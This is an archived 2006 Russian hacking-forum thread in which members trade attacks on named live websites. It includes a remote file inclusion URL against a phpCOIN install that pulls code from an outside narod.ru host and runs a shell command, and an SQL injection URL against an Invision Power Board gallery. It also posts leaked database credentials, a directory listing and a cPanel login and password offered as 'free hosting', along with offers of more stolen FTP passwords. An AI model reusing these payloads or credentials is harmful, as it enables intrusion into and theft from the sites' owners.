PDA

Просмотр полной версии : Уязвимости на fantoo.ru

Mobile
18.02.2006, 22:53
Странно, что человек администрирующий такой интересный и трудоёмкий проект, допускает такие глупейшие ошибки...
fantoo.ru/includes
fantoo.ru/database
Там есть ещё куча багов, но публиковать небуду.
Tem
18.02.2006, 23:15
Да прямо шок.
D1mOn
18.02.2006, 23:17
просто права на папки и файлы не выставил)
Tem
18.02.2006, 23:30
Зато на какие файлы ))
A110ut
18.02.2006, 23:36
ндя... бывает и такое)
Rebz
18.02.2006, 23:57
Хах.. бывают же в жизни сопадения)

Ну-ка.. кто найден пореальней багу тот приз получит =))) считая что все же права на папочки расставлены грамотно и доступ к ним закрыт =)
Ах да.. и определить что это за движок =)
Inferno
19.02.2006, 00:18
powered-by-drupal или я ошыбаюсь?
Mobile
19.02.2006, 00:21
Хах.. бывают же в жизни сопадения)

Ну-ка.. кто найден пореальней багу тот приз получит =))) считая что все же права на папочки расставлены грамотно и доступ к ним закрыт =)
Ах да.. и определить что это за движок =)
Я у же находил пореальней, мож выложу
Rebz
19.02.2006, 00:23
Inferno, верно.! :)
Как насчет баг?:)

Выкладывай, тебе это только на пользу будет, т.е. это тебе будет в плюс =) .. так актуальней звучит :)
D1mOn
19.02.2006, 00:26
Ребз, ну я нашёл анонимный вход на фтп))) кароч сервак не настроен совсем)
Rebz
19.02.2006, 00:26
D1mOn, я говорю про сам движок, а не про этот конкретный случай :)
Mobile
19.02.2006, 00:44
На http://www.freedom-uk.com багу нашёл
Это хостинг английский, бага в phpcoin
Диагноз выполнение никсовых команд
например
http://www.freedom-uk.com/config.php?_CCFG[_PKG_PATH_DBSE]=http://qwe20063.narod.ru/&cmd=id
Rebz
19.02.2006, 00:49
полюбому + =)
А если по drupal?)
D1mOn
19.02.2006, 00:54
вот ещё нашёл http://fantoo.ru/update.php
D1mOn
19.02.2006, 01:04
-rwxr-xr-x 1 freedom freedom 1659 Nov 27 19:38 .htaccess
drwxr-xr-x 2 freedom freedom 1024 Aug 14 2005 database
-rwxr-xr-x 1 freedom freedom 8430 Jun 11 2003 favicon.ico
drwxr-xr-x 2 freedom freedom 1024 Sep 16 04:10 files
drwxr-xr-x 2 freedom freedom 1024 Aug 14 2005 includes
-rwxr-xr-x 1 freedom freedom 595 Aug 21 2004 index.php
drwxr-xr-x 2 freedom freedom 1024 Aug 14 2005 misc
drwxr-xr-x 2 freedom freedom 1024 Aug 14 2005 modules
drwxr-xr-x 2 freedom freedom 1024 Aug 14 2005 scripts
drwxr-xr-x 3 freedom freedom 1024 Aug 14 2005 sites
drwxr-xr-x 6 freedom freedom 1024 Aug 14 2005 themes
-rwxr-xr-x 1 freedom freedom 8788 Sep 17 02:50 update.php
-rwxr-xr-x 1 freedom freedom 347 Aug 14 2005 xmlrpc.php
Rebz
19.02.2006, 01:05
С этого момента поподробней :))) Или в ПМ =))
tclover
19.02.2006, 01:12
Снимайте видео!
D1mOn
19.02.2006, 01:12
да не это отсюда http://www.freedom-uk.com/config.php?_CCFG[_PKG_PATH_DBSE]=http://qwe20063.narod.ru/&cmd=id )
Rebz
19.02.2006, 01:15
Ах вот оно что =)))
Ну хитрец) Я же просил найти багу в движке а не через сервак попасть туда =)
D1mOn
19.02.2006, 01:17
я ищу)))
ЗЫ Ребз, с 777 сообщением тебя)))
Inferno
19.02.2006, 01:23
Description ----------- The Drupal Security Team has found that the privilege system of Drupal can be circumvented in a very special case because an input check is not implemented properly.
Impact ------ If public registration is allowed then it is possible for an attacker to obtain additional user roles. As a result, an attacker could grant himself administration privileges.
Багов есть много)
Rebz
19.02.2006, 01:26
Попробуй провести атаку и реализовать багу :)
limpompo
19.02.2006, 01:40
$_DBCFG['dbuname'] = "freedom_coin2";
$_DBCFG['dbpass'] = "8wns9NvEKDwS";
Rebz
19.02.2006, 01:43
нда, хостер.. )

мы про движок)
D1mOn
19.02.2006, 01:43
эт ты про хостера)
Mobile
19.02.2006, 16:11
http://eol3d.com бага на форуме (и в галерее)
двиг- Invision Power Board
Диагноз sql иньекция
http://eol3d.com/forum/index.php?act=module&module=gallery&cmd=slideshow&show='
Rebz
19.02.2006, 16:22
это и есть sql-inj

Ток вы уже не по теме стали писать..эх
Mobile
19.02.2006, 16:24
это и есть sql-inj

Ток вы уже не по теме стали писать..эх
А я просто багу выложил, тыж сам говорил выкладывайте баги...
Mobile
19.02.2006, 18:56
если кому нужны ftp пассы к сайтам, ставьте (+), я пасс в ПМ отправлю
сайты в домене com
Mobile
21.02.2006, 17:21
На http://www.freedom-uk.com багу нашёл
Это хостинг английский, бага в phpcoin
Диагноз выполнение никсовых команд
например
http://www.freedom-uk.com/config.php?_CCFG[_PKG_PATH_DBSE]=http://qwe20063.narod.ru/&cmd=id
Народ, имейте совесть! Я выложил этот пример не для того чтоб несколько человек продавали один и тот-же хостинг. Это несовсем честно...
Ищите баги на сайтах сами :mad:
Mobile
21.02.2006, 17:37
Короче скорей всего вылажу логин и пасс к хостингу в раздел Халява
Rebz
21.02.2006, 17:45
Нда, народ халяву любит...

Ладно, думаю тема исчерпала себя..)
Mobile
21.02.2006, 18:06
Хостинг на халяву!
www.freedom-uk.com/cpanel
login: freedom
pass: ikalinga1
Пользуйтесь, если можно поставьте плюсик
SanyaX
21.02.2006, 19:14
А кто что продаёт?
Mobile
25.02.2006, 11:10
У меня есть ещё куча хостингов, кто заинтересуется, стучите